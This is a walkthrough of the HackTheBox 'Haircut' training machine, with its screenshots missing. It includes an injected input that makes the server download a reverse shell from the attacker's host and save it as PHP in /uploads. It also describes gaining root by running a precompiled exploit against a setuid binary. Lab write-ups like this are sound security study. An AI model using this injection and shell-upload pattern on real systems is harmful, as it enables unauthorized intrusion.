HackTheBox Haircut Walkthrough

Dare I say this box was easy?  Maybe not for everyone, of course, but I will say this could be the quickest HtB box I've ever rooted.  There's a little bit of hunting and a little be of creativity required.  Aside from that, take a look at what's in your hand and do some Googling, you can figure this one out quickly.

We kick off with Nmap:





Not much here.  Web seems like the obvious entry.  We view the default page:





Viewing source reveals nothing. 

Hitting it with GoBuster:





Two things stand out:  exposed.php & /uploads

Checking out the php page:





Tossing a few things in there to get an idea of what I'm dealing with and I uncover an error:





We can direct it to our attacking server which is hosting a reverse shell in .txt format.  If you host it with a .php extension, you pop your own box.  #truestory

The full syntax is this:  http://192.168.86.99/rshell443.txt --output ./uploads/rshell443.php





Now when we browse to our shell in the /uploads directory:





With our handler setup:





Hunting for setuid binaries:





One sticks out. 

A quick search reveals:





If you attempt to run this on the victim's box, you will find that gcc is missing.  If you run this on your attacking machine, you can collect the compiled pieces in the /tmp directory and move them over to the /tmp directory on the victim.  When you execute the script.sh exploit, you still get the gcc error but we already have the files and we get root:





You'll notice I skipped right over user.txt -- that's because I rooted this box so fast that I didn't even bother looking for it.  I'll leave that up to you.

Going for the root flag:




#gameover

Quick but still fun.